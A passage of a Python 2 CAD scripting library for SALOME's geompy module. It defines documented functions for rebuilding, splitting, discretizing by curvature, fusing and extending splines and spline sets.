Default value: None
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "RebuiltSpline (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "RebuiltSpline (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge
Number: 1
Name: "RebuiltSpline"
Conditions of use:
-
"""
#if isinstance(np, str): print "[X] The first argument (np) should be an integer."; return
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edge = GetGUISelection(edge)
edge = GetObject(edge)
#-
# Make this function recursive
if isinstance(edge, list):
return_list = []
for sub_object in edge:
return_list.append(RebuildSpline(np, sub_object, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [edge] or None in [edge]: return
#-
# Set father object
father = None
if infa == True: father = edge
#-
if False: pass
else:# All checks done
# Get the list of positions where to create vertexes
if isinstance(np, list):
parameter_list = np
else:
parameter_list = [float(i) / (np - 1) for i in range(np)]
#-
# Create the points
points = []
for parameter in parameter_list:
points.append(geompy.MakeVertexOnCurve(edge, parameter))
#-
if dim == 0:# If the output dimension is 0...
to_return = points
to_return_name = "RebuiltSpline (Vertex)"
if single == True:
compound = geompy.MakeCompound(to_return)
to_return = compound
to_return_name = "RebuiltSpline (Vertexes)"
else:
# Create the edge
rebuilt_spline = geompy.MakeInterpol(points)
#-
to_return = rebuilt_spline
to_return_name = "RebuiltSpline"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
rs = RebuildSpline
def SplitEdge( np = 20, edge = None, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Splits an edge into a discretized wire.
Arguments:
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# edge
Description: The edge to split.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "SplitEdge (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "SplitEdge (Vertexes)"
"dim" value: 1
"single" value: -
Type: Wire
Number: 1
Name: "SplitEdge"
Conditions of use:
-
"""
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edge = GetGUISelection(edge)
edge = GetObject(edge)
#-
# Make this function recursive
if isinstance(edge, list):
return_list = []
for sub_object in edge:
return_list.append(SplitEdge(np, sub_object, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [edge] or None in [edge]: return
#-
# Set father object
father = None
if infa == True: father = edge
#-
if False: pass
else:# All checks done
# Get the list of positions where to create vertexes
if isinstance(np, list):
parameter_list = np
else:
parameter_list = [float(i) / (np - 1) for i in range(np)]
#-
# Create the points
points = []
for parameter in parameter_list:
points.append(geompy.MakeVertexOnCurve(edge, parameter))
#-
if dim == 0:# If the output dimension is 0...
to_return = points
to_return_name = "SplitEdge (Vertex)"
if single == True:
compound = geompy.MakeCompound(to_return)
to_return = compound
to_return_name = "SplitEdge (Vertexes)"
else:
# Partition the edge
partition = geompy.MakePartition([edge], points)
#-
# Explode the partition in edges
edges = geompy.SubShapeAll(partition, geompy.ShapeType["EDGE"])
#-
# Create the wire
wire = geompy.MakeWire(edges)
#-
to_return = wire
to_return_name = "SplitEdge"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
se = SplitEdge
def DiscretizeEdgeByCurvature( edge = None, np = 20, fine = 1e3, it_max = 10, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Discretizes an edge into a wire made of straight edges taking into account the local curvature.
Arguments:
# edge
Description: The edge to discretize.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# np
Description: See here. In this case, corresponds to the number of vertexes used for the first iteration.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# fine
Description: The desired fineness. Higher it is, finer is the discretization.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e3
# it_max
Description: The maximum number of iterations.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 10
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "EdgeDiscretizedByCurvature (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "EdgeDiscretizedByCurvature (Vertexes)"
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "EdgeDiscretizedByCurvature (Edge)"
"dim" value: 1
"single" value: True
Type: Wire
Number: 1
Name: "EdgeDiscretizedByCurvature"
Conditions of use:
-
"""
input_shape = edge
# Check the "dim" value
if dim not in [ - 1, 0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
#-
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(DiscretizeEdgeByCurvature(sub_object, np, fine, it_max, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Check the input shape type
if geompy.NumberOfEdges(input_shape) != 1:
print "[X] The first argument (edge) should be a single edge."; return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
edge = input_shape
if False: pass
else:# All checks done
if np < 2:
np = 2
# Get the edge length
edge_length = geompy.BasicProperties(edge)[0]
#-
# Deduce the max distance above which to refine
dist = edge_length / fine
#-
# Create a first set of equidistqnt vertexes
parameter_list = [n / float(np - 1) for n in range(np)]
vertex_list = [geompy.MakeVertexOnCurve(edge, parameter) for parameter in parameter_list]
#-
for j in range(it_max):# For each iteration...
# Get segments to refine
nb_vertexes = len(vertex_list)
segment_to_refine_index_list = []
for i in range(nb_vertexes - 2):
p0 = parameter_list[i]
p1 = parameter_list[i + 1]
p2 = parameter_list[i + 2]
v0 = vertex_list[i]
v1 = vertex_list[i + 1]
v2 = vertex_list[i + 2]
straight_edge = geompy.MakeEdge(v0, v2)
distance = geompy.MinDistance(v1, straight_edge)
if distance > dist:
segment_to_refine_index_list.extend([i, i + 1])
segment_to_refine_index_list = list(set(segment_to_refine_index_list))
segment_to_refine_index_list.sort()
#-
if len(segment_to_refine_index_list) == 0:
break
# Refine segments
new_parameter_list = list(parameter_list)
new_vertex_list = list(vertex_list)
for segment_to_refine_index in reversed(segment_to_refine_index_list):
index = segment_to_refine_index
p0 = parameter_list[index]
p1 = parameter_list[index + 1]
p01 = (p0 + p1) / 2.0
new_parameter_list.insert(index + 1, p01)
v01 = geompy.MakeVertexOnCurve(edge, p01)
new_vertex_list.insert(index + 1, v01)
parameter_list = list(new_parameter_list)
vertex_list = list(new_vertex_list)
#-
if dim == -1:
# Add and return the resulting shape(s)
to_return = parameter_list
return to_return
#-
elif dim == 0:
to_return = vertex_list
to_return_name = "EdgeDiscretizedByCurvature (Vertex)"
if single == True:
compound = geompy.MakeCompound(vertex_list)
to_return = compound
to_return_name = "EdgeDiscretizedByCurvature (Vertexes)"
else:
# Create a polyline from vertexes
nb_vertexes = len(vertex_list)
segment_list = []
for i in range(nb_vertexes - 1):
v1 = vertex_list[i]
v2 = vertex_list[i + 1]
segment = geompy.MakeEdge(v1, v2)
segment_list.append(segment)
#-
to_return = segment_list
to_return_name = "EdgeDiscretizedByCurvature (Edge)"
if single == True:
wire = geompy.MakeWire(segment_list)
to_return = wire
to_return_name = "EdgeDiscretizedByCurvature"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
debc = DiscretizeEdgeByCurvature
def FuseSplines( edges = [None], np = 20, curv = True, tol = 1e-7, single = True, add = True, dim = 1 ):
"""
Description:
Fuses two edges.
Arguments:
# edges
Description: The edges to fuse.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# np
Description: See here. In this case, the number of points is divided up between input edges according to their lenght.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "FusedSpline (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "FusedSpline (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge
Number: 1
Name: "FusedSpline"
Conditions of use:
For better results, if coincident, both splines has to be as tangential as possible.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(edges, list) == False: print "[X] The second argument (edges) should be an array."; return
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edges = GetGUISelection(edges)
edges = GetObject(edges)
#-
# Check the input shape existence
if "error" in edges or None in edges: return
#-
# Check the number of selected objects
if len(edges) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
# Get the number of points on each edge
length_1 = geompy.BasicProperties(edges[0])[0]
length_2 = geompy.BasicProperties(edges[1])[0]
total_lenght = length_1 + length_2
np_1 = int(round(float(np) * length_1 / total_lenght))
np_2 = int(round(float(np) * length_2 / total_lenght))
#-
# Extract the edge vertexes
#### Here the extremum vertexes are created on curve
#### and not exploded to be sure the vertex order
#### respects the edge orientation
edge_vertexes = [
geompy.MakeVertexOnCurve(edges[0], 0),
geompy.MakeVertexOnCurve(edges[0], 1),
geompy.MakeVertexOnCurve(edges[1], 0),
geompy.MakeVertexOnCurve(edges[1], 1)
]
#### -
#-
# Determine the edge directions
min_distances = [
geompy.MinDistance(edge_vertexes[0], edges[1]),
geompy.MinDistance(edge_vertexes[1], edges[1]),
geompy.MinDistance(edges[0], edge_vertexes[2]),
geompy.MinDistance(edges[0], edge_vertexes[3])
]
reverse_edges = [False, False]
if min_distances[0] < min_distances[1]:
reverse_edges[0] = True
if min_distances[2] > min_distances[3]:
reverse_edges[1] = True
#-
# Check if splines are touching each other
edges_are_coincident = False
if min(min_distances) <= tol:
edges_are_coincident = True
#-
# Split edge_1
if curv == True:
parameter_list = DiscretizeEdgeByCurvature(edges[0], np_1, dim = -1)
else:
parameter_list = [n / float(np_1) for n in range(np_1 + 1)]
if edges_are_coincident:
del parameter_list[-1]
fused_spline_vertexes = []
for parameter in parameter_list:
if reverse_edges[0] == True:
parameter = 1 - parameter
edge_1_vertex = geompy.MakeVertexOnCurve(edges[0], parameter)
fused_spline_vertexes.append(edge_1_vertex)
#-
# Split edge_2
if curv == True:
parameter_list = DiscretizeEdgeByCurvature(edges[1], np_2, dim = -1)
else:
parameter_list = [n / float(np_2) for n in range(np_2 + 1)]
for parameter in parameter_list:
if reverse_edges[1] == True:
parameter = 1 - parameter
edge_2_vertex = geompy.MakeVertexOnCurve(edges[1], parameter)
fused_spline_vertexes.append(edge_2_vertex)
#-
if dim == 0:# If the output dimension is 0...
to_return = fused_spline_vertexes
to_return_name = "FusedSpline (Vertex)"
if single == True:
compound = geompy.MakeCompound(fused_spline_vertexes)
to_return = compound
to_return_name = "FusedSpline (Vertexes)"
else:
# Create the fused edge
fused_spline = geompy.MakeInterpol(fused_spline_vertexes, False, False)
#-
to_return = fused_spline
to_return_name = "FusedSpline"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
fs = FuseSplines
def ExtendSpline( edge_and_vertex = [None], np = 20, pos = "auto", strat = "flex", curv = True, tol = 1e-7, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Extends an edge to a vertex position.
Arguments:
# edge_and_vertex
Description: The edge to extend and the target vertex.
Type: List of 1 Edge + 1 Vertex
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# np
Description: See here. In this case, correspond to the number of vertexes created on the input edge.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 10
# pos
Description: If equals "before" or "after", the edge is extended from it start or its end respectively (according to its orientation). If equals "auto", the function decides itself.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "auto"
# strat
Description: Defines the extension strategy. If equals "rigid" or "flex", the edge is respectively extended with or without a constrain on the straightness of the extension.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "flex"
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "ExtendedSpline (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "ExtendedSpline (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge
Number: 1
Name: "ExtendedSpline"
Conditions of use:
-
"""
if isinstance(edge_and_vertex, list) == False: print "[X] The first argument (edge_and_vertex) should be an array."; return
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edge_and_vertex = GetGUISelection(edge_and_vertex)
edge_and_vertex = GetObject(edge_and_vertex)
#-
# Check the input shape existence
if "error" in edge_and_vertex or None in edge_and_vertex: return
#-
# Check the number of selected objects
if len(edge_and_vertex) != 2:
print "[X] Two shapes should be selected."
return
#-
# Distinguish input shapes
edge = None
vertex = None
for object in edge_and_vertex:
nb_vertexes = len(geompy.SubShapeAll(object, geompy.ShapeType["VERTEX"]))
if nb_vertexes == 1: vertex = object
if nb_vertexes == 2: edge = object
if None in [edge, vertex]:
print "[X] Only an edge and a vertex should be selected."
return
#-
# Set father object
father = None
if infa == True: father = edge
#-
if False: pass
else:# All checks done
# Get the sub-shapes
[edge, vertex] = GetSubShapes([edge, vertex])
#-
# Check if the edge and vertex are not coincident
vertex_is_coincident = False
for edge_vertex in edge[0]:
distance = geompy.MinDistance(edge_vertex, vertex[-1])
if distance <= tol:
vertex_is_coincident = True
#-
# Check the position
if pos not in ["auto", "before", "after"]:
pos = "auto"
#-
# Get the pos of the user vertex
if pos == "auto":
vertex_distances = [
geompy.MinDistance(vertex[-1], edge[0][0]),
geompy.MinDistance(vertex[-1], edge[0][1])
]
pos = "after"
if vertex_distances[0] < vertex_distances[1]:
pos = "before"
#-
# Create the spline vertexes
if curv == True:
np_or_params = DiscretizeEdgeByCurvature(edge[-1], np, dim = -1)
else:
np_or_params = np
spline_vertexes = RebuildSpline(np_or_params, edge[-1], dim = 0, single = False, add = False)
if not vertex_is_coincident:
if strat == "rigid":
if pos == "before":
extension = geompy.MakeEdge(vertex[-1], edge[0][0])
if pos == "after":
extension = geompy.MakeEdge(edge[0][1], vertex[-1])
spline_vertexes = FuseSplines([edge[-1], extension], np = np, dim = 0, add = False)
spline_vertexes = geompy.SubShapeAll(spline_vertexes, geompy.ShapeType["VERTEX"])
else:# strat = "flex"
if pos == "before":
spline_vertexes.insert(0, vertex[-1])
#for parameter in [n / float(np) for n in range(np + 1)]:
#splineVertex = geompy.MakeVertexOnCurve(edge[-1], parameter)
#splineVertexes.append(spline_vertex)
if pos == "after":
spline_vertexes.append(vertex[-1])
#-
if dim == 0:# If the output dimension is 0...
to_return = spline_vertexes
to_return_name = "ExtendSpline (Vertex)"
if single == True:
# Create the vertex compound
spline_vertex_compound = geompy.MakeCompound(spline_vertexes)
#-
to_return = spline_vertex_compound
to_return_name = "ExtendSpline (Vertexes)"
else:
# Create the extended spline
extended_spline = geompy.MakeInterpol(spline_vertexes, False, False)
#-
to_return = extended_spline
to_return_name = "ExtendSpline"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
es = ExtendSpline
def ExtendSplinesToIntersection( edges = [None], np = 20, curv = True, tol = 1e-4, single = True, add = True ):
"""
Description:
Extends two splines to intersection points.
Arguments:
# edges
Description: The edges to extend.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-4
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: False
Type: Edge
Number: 2
Name: "SplineExtendedToIntersection"
"dim" value: -
"single" value: True
Type: Wire or Compound of Edges
Number: 1
Name: "SplinesExtendedToIntersection"
Conditions of use:
To detect intersection, both input splines must be as coplanar as possible.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer."; return
if isinstance(edges, list) == False: print "[X] The second argument (edges) should be an array."; return
input_shapes = edges
# Get the input shape(s)
input_shapes = GetGUISelection(input_shapes)
input_shapes = GetObject(input_shapes)
#-
# Check the input shape existence
if "error" in input_shapes or None in input_shapes: return
#-
# Check the number of selected objects
if len(input_shapes) != 2:
print "[X] Two shapes should be selected."
return
#-
edges = input_shapes
if False: pass
else:# All checks done
small_value = 1e-3
length_1 = geompy.BasicProperties(edges[0])[0]
length_2 = geompy.BasicProperties(edges[1])[0]
infinite_distance = (length_1 + length_2) * 1e2
# Create boundary direction vectors
direction_vectors = []
boundary_vertexes = []
for i in range(2):
edge = edges[i]
v11 = geompy.MakeVertexOnCurve(edge, 0.0 + small_value)
v12 = geompy.MakeVertexOnCurve(edge, 0.0)
v21 = geompy.MakeVertexOnCurve(edge, 1.0 - small_value)
v22 = geompy.MakeVertexOnCurve(edge, 1.0)
boundary_vertexes.append([v12, v22])
direction_vector_1 = geompy.MakeVector(v11, v12)
direction_vector_2 = geompy.MakeVector(v21, v22)
direction_vectors.append([direction_vector_1, direction_vector_2])
#-
# Extend edges
for i in range(2):# For each extremity of the first edge...
direction_vector_1 = direction_vectors[0][i]
vertex_1 = boundary_vertexes[0][i]
extrusion_1 = geompy.MakePrismVecH(vertex_1, direction_vector_1, infinite_distance)
# Get possible intersections with the second edge
possible_intersections = []
for j in range(2):
direction_vector_2 = direction_vectors[1][j]
vertex_2 = boundary_vertexes[1][j]
extrusion_2 = geompy.MakePrismVecH(vertex_2, direction_vector_2, infinite_distance)
distance = geompy.MinDistance(extrusion_1, extrusion_2)
if distance < tol:
[x, y, z] = geompy.ClosestPoints(extrusion_1, extrusion_2)[1][0:3]
intersection = geompy.MakeVertex(x, y, z)
possible_intersections.append(intersection)
#-
# Keep the closest intersection
final_intersection = None
nb_possible_intersections = len(possible_intersections)
if nb_possible_intersections > 1:
closest_intersection = None
min_distance = infinite_distance
for possible_intersection in possible_intersections:
distance = geompy.MinDistance(vertex_1, possible_intersection)
if distance < min_distance:
closest_intersection = possible_intersection
min_distance = distance
final_intersection = closest_intersection
elif nb_possible_intersections == 1:
final_intersection = possible_intersections[0]
#-
# Extend edges
if final_intersection != None:
for j in range(2):
edges[j] = ExtendSpline([edges[j], final_intersection], strat = "rigid", np = np, curv = curv, tol = tol, add = False)
#-
#-
to_return = edges
to_return_name = "SplineExtendedToIntersection"
if single == True:
try:
wire = geompy.MakeWire(to_return)
except:
wire = geompy.MakeCompound(to_return)
to_return = wire
to_return_name = "SplinesExtendedToIntersection"
# Add and return the resulting shape(s)
if add == True:
AddToStudy(to_return, to_return_name)
return edges
#-
esti = ExtendSplinesToIntersection
def FuseSplineSets( compounds = [None], np = 20, curv = True, tol = 1e-7, add = True ):
"""
Description:
Fuses two sets of splines.
Arguments:
# compounds
Description: The spline sets to fuse.
Type: List of 2 Compounds of Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Compound of Edges
Number: 1
Name: "FusedSplineSets"
Conditions of use:
Input spline sets must be coinciding, that is sharing boundary nodes or edge.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(compounds, list) == False: print "[X] The second argument (compounds) should be an array."; return
# Get the input shape(s)
compounds = GetGUISelection(compounds)
compounds = GetObject(compounds)
#-
# Check the input shape existence
if "error" in compounds or None in compounds: return
#-
# Check the number of selected objects
if len(compounds) != 2:
print "[X] Exactly two objects should be selected."
return
#-
# Check the input shape characteritics
for object in compounds:
nb_edges = int(geompy.WhatIs(object).split("\n")[2].split(": ")[1])
if nb_edges < 2:
print "[X] Input objects should contain at least two edges"
return
#-
else:# All checks done
# Get the sub-shapes
[compound1, compound2] = GetSubShapes(compounds)
#-
# Check compound position
side_by_side = True
n = 0
for compound1_edge in compound1[1]:# For each edge of the first compound...
compound1_edge_vertexes = geompy.SubShapeAll(compound1_edge, geompy.ShapeType["VERTEX"])
for compound2_edge in compound2[1]:
min_distance1 = geompy.MinDistance(compound2_edge, compound1_edge_vertexes[0])
min_distance2 = geompy.MinDistance(compound2_edge, compound1_edge_vertexes[1])
if min_distance1 <= tol and min_distance2 <= tol:
side_by_side = False
del compound1[1][n]
break
n += 1
#-
if side_by_side == True:
# Check the number of edges
nb_edges1 = int(geompy.WhatIs(compound1[-1]).split("\n")[2].split(": ")[1])
nb_edges2 = int(geompy.WhatIs(compound2[-1]).split("\n")[2].split(": ")[1])
if nb_edges1 != nb_edges2:
print "[X] Input compounds should have a same number of edges"
return
#-
fused_splines = []
for compound1_edge in compound1[1]:# For each edge of the first compound...
# Get the touching edge in the second compound
closest_compound2_edge = None
min_distance = 1e99
for compound2_edge in compound2[1]:
distance = geompy.MinDistance(compound2_edge, compound1_edge)
if distance <= min_distance:
min_distance = distance
closest_compound2_edge = compound2_edge
#-
# Fuse edges
fused_spline = FuseSplines([compound1_edge, closest_compound2_edge], np = np, curv = curv, tol = tol, add = False)
#-
# Add the fused spline to the list
fused_splines.append(fused_spline)
#-
# Create the fused spline compound
fused_spline_compound = geompy.MakeCompound(fused_splines)
#-
else:
fused_spline_compound = geompy.MakeCompound(compound1[1] + compound2[1])
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fused_spline_compound, "FusedSplineSets")
return fused_spline_compound
#-
fss = FuseSplineSets
def UnrefineSplineSet( fact = 2, compound = None, add = True, infa = False ):
"""
Description:
Unrefines a spline set.
Arguments:
# fact
Description: The unrefinement factor. For example, if equals 2, one spline over two is kept.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 2
# compound
Description: The spline set to unrefine.
Type: Compounds
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: false
Returned Values:
"dim" value: -
"single" value: -
Type: Compound of Edges
Number: 1
Name: "UnrefinedSplineSet"
Conditions of use:
-
"""
# Get the input shape(s)
compound = GetGUISelection(compound)
compound = GetObject(compound)
#-
# Make this function recursive
if isinstance(compound, list):
return_list = []
for sub_object in compound:
return_list.append(UnrefineSplineSet(fact, sub_object, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [compound] or None in [compound]: return
#-
# Check the input shape characteritics
nb_edges = int(geompy.WhatIs(compound).split("\n")[2].split(": ")[1])
if nb_edges < 2:
print "[X] The selected object should be a compound containing several edges."
return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
#-
# Unrefine the edge compound
unrefined_edges = []
for i in range(nb_edges - 1):
if i%fact == 0 and nb_edges - i > fact:
unrefined_edges.append(compound[1][i])
unrefined_edges.append(compound[1][i + 1])
#-
# Create the unrefined edge compound
unrefined_compound = geompy.MakeCompound(unrefined_edges)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(unrefined_compound, "UnrefinedSplineSet")
return unrefined_compound
#-
uss = UnrefineSplineSet
def SwitchSplineSet( compound = None, np = "auto", add = True, infa = False ):
"""
Description:
Sitches the orientation of a spline set.
Arguments:
# compound
Description: The spline set to switch.
Type: Compounds
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# np
Description: See here. In this case, if equals "auto", the number of points is set equal to the number of splines in the input spline set.
Type: Integer or String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "auto"
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: false
Returned Values:
"dim" value: -
"single" value: -
Type: Compound of Edges
Number: 1
Name: "SwitchedSplineSet"
Conditions of use:
-
"""
# Get the input shape(s)
compound = GetGUISelection(compound)
compound = GetObject(compound)
#-
# Make this function recursive
if isinstance(compound, list):
return_list = []
for sub_object in compound:
return_list.append(SwitchSplineSet(sub_object, np, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [compound] or None in [compound]: return
#-
# Check the input shape characteritics
nb_edges = int(geompy.WhatIs(compound).split("\n")[2].split(": ")[1])
if nb_edges < 2:
print "[X] The selected object should be a compound containing several edges."
return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
#-
if np == "auto":
np = len(compound[1])
# Create splines
splines = []
for parameter in [n / float(np - 1) for n in range(np)]:
spline_vertexes = []
for edge in compound[1]:
spline_vertex = geompy.MakeVertexOnCurve(edge, parameter)
spline_vertexes.append(spline_vertex)
spline = geompy.MakeInterpol(spline_vertexes)
splines.append(spline)
#-
# Put them into a compound
switched_compound = geompy.MakeCompound(splines)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(switched_compound, "SwitchedSplineSet")
return switched_compound
#-
sss = SwitchSplineSet
def RebuildFace( np = 30, face = None, rel = False, switch = False, tol = 1e-7, single = True, add = True, infa = False, dim = 2 ):
"""
Description:
Rebuilds a face using its iso-lines.
Arguments:
# np
Description: See here. In addition, if this argument is an list of 2 integers, the first number gives the number of isolines created to rebuild the face and the second number gives the number of points used to create each isoline (see the above script example).
Type: Integer or List of 2 Integers
GUI selection: -
Selection by name: -
Recursive: -
Default value: 30
# face
Description: The face to rebuild.
Type: Face
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# rel
Description: If equals True, the function try to relimit the rebuild face using the source face edges.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# switch
Description: If equals True, the iso-curves are switched from iso-u to iso-v.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
